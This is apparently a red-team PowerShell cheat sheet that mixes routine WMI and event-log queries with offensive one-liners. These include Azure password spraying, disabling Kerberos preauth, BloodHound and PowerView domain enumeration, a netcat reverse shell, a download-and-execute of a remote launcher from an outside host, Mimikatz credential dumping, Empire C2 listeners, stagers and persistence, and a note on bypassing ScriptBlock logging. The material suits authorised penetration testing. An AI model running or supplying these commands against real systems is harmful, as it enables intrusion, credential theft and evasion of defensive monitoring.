Hooper Labs

PowerShell Tips and Tricks

List all services that do not run as a standard account

	Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* | Where-Object {($_.ObjectName -notlike 'NT Authority\*') -and ($_.ObjectName -ne $null) -and ($_.ObjectName -ne "LocalSystem")}

Comparison Operators

Greater Than / Less Than

Wildcard Matching

	-like 'powersh*'


Create a PSCredential

Enter a Remote Session (admin access required)

Run a Remote Command

	Get-WMIObject –ComputerName remotehost –query "Select * from Win32_Service Where Name=‘LanManServer'"" | Format-Table

Disable Kerberos PreAuth

	Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

Import a Module

	Import-Module -Name .\MSOLSpray.ps1; 

Azure Password Spray

	Invoke-MSOLSpray -Userlist ./users.txt -Password "Spring2020"

PowerShell Command History File

	% AppData Roaming Microsoft Windows PowerShell PSReadLine ConsoleHost_history.txt


List all Files in Directory

	Get-ChildItem C:\Users\user -Recurse

List Scheduled Tasks

Raw WMIC Query

	Get-CimInstance -Query "SELECT * from Win32_Process WHERE name LIKE 'P%'"

Get AVs Installed

List All Namespaces

	Get-WmiObject -Namespace root\CIMv2 -list

List Running Servcies

	Get-WmiObject -Query "SELECT * FROM win32_service WHERE state='running'" 

List Services Beginning with "T"

	Get-WmiObject -Query "SELECT * FROM win32_service WHERE name LIKE '[tT]%'"

List Processes Like "owershell"

	gwmi win32_process -Filter "name LIKE ‘_owershell%'"

Remote Get-WMIObject Command

	Get-WMIObject –ComputerName remotehost –query "Select * from Win32_Service Where Name='LanManServer'" | Format-Table


EXE Ingestor

	.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>

Powershell Ingestor (SharpHound.ps1)

	Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>

Start Neo4J and Import Bloodhound Results


Enumerate User

	Get-NetUser <user>

Enumerate Group

	Get-NetGroup <group>

Enumerate Computers

	Get-NetComputer -FullData

Enumerate Live Machines

	Get-NetComputer -Ping

Get Groups for which User is member

	Get-NetGroup -Username <user>

Group Members

	Get-NetGroupMember <group> -Domain <DomainName>

Enumerate Domain Shares

	Find-DomainShare (-CheckShareAccess)

Enumerate Group Policies


Enumerate Group Policy for Specific Computer

	Get-NetGPO -ComputerName cpu.local

Enumerate OUs


Enumerate ACLs

	Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs

Find Interesting ACEs

	Invoke-ACLScanner -ResolveGUIDs

Check ACLs associated with SMB Share

	Get-PathAcl -Path "\\Path\to\share"

Enumerate Domain Trusts


Enumerate Forest Trusts


Find All Local Admins

	Invoke-EnumerateLocalAdmin -Verbose

Find Computers Where DA has Session

	Invoke-UserHunter -GroupName "RDPUsers" (-Stealth)

Apply New ACL

	New-Item File.txt | Get-Acl | Set-ACl foobar.ps1

Get all effective member of group

	Get-NetGroupMember -GroupName <group> -Recurse

Search the forest global catalog

	Get-NetUser -UserName <user> -ADSpath "GC: //domain.com"

Find Privileged Machine Accounts

	Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Find Domain Admins and Users with same first/last name

	Get-NetGroupMember -GroupName "Domain Admins" -FullData | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)"} | Select-Object -Property displayname,samaccountname

New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO...' -Force

Check Last Password Change

	Get-UserProperty -Properties pwdlastset

Find Logged In Users

	Get-NetLoggedOn -ComputerName <ComputerName>

Basic NC connectback

	powershell.exe -NoExit -Command 'C:/temp/temp2/nc.exe -v 4444 -e powershell'

One-Liner (no script on disk)


Run remote script (in-memory)

	powershell -Command "$ip='http://A.B.C.D:22/launcher.ps1; IEX (New-Object Net.webclient).DownloadString($ip)"

Run remote HTA (in-memory)

Encoded Commands


Dump Creds

	Invoke-Mimikatz -DumpCreds -ComputerName remotehost

Execute Classic Mimikatz Commands

	Invoke-Mimikatz -Command '"privilege::debug"'

PowerShell Empire

Set up a HTTP Listener (C2 profile)

	listeners; uselistener http; set Host a.b.c.d:8080; execute;

Create an Empire launcher (rat/aka way to get shellz)

	listeners; usestager multi/launcher; set Listener http; set OutFile /opt/agent.ps1; generate

List all Agents


Interact with an Agent

	interact AGENT1

Rename an Agent

	rename AGENTNEW

Persist with a Module

	usemodule persistence/userland/schtasks; set Listener http; set IdleTime 2; set Agent autorun; run

Import a PowerShell Script and Run

	agents; interact AGENT1; scirptimport /opt/Do-Thing.ps1; scriptcmd Do-Thing

Empire Powershell Payload

	powershell -noP -sta -w1 -enc <base64-encoded-payload>

ScriptBlock Logging

	Logging feature that captures PS scripts in readable form.  Empire may bypass by unhooking it via "cachedGroupPolicySettings" variable manipulation.  It may also nullify the "suspicious strings" array.  

Query Windows Events

	Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational -MaxEvents 5

Query Specific Windows Event IDs

	-Get-WinEvent -FilterHashTable @{logname='Microsoft-Windows-Sysmon/Operational'; Id=10}


List Environment Variables

	Get-ChildItem Env:

Quickly list out numbers


List Properties of a Registry Key

	(Get-Item HKLM:\SYSTEM\CurrentControlSet\Control\Lsa) | Get-ItemProperty

Run .PS1 File

	. .\Add-SSP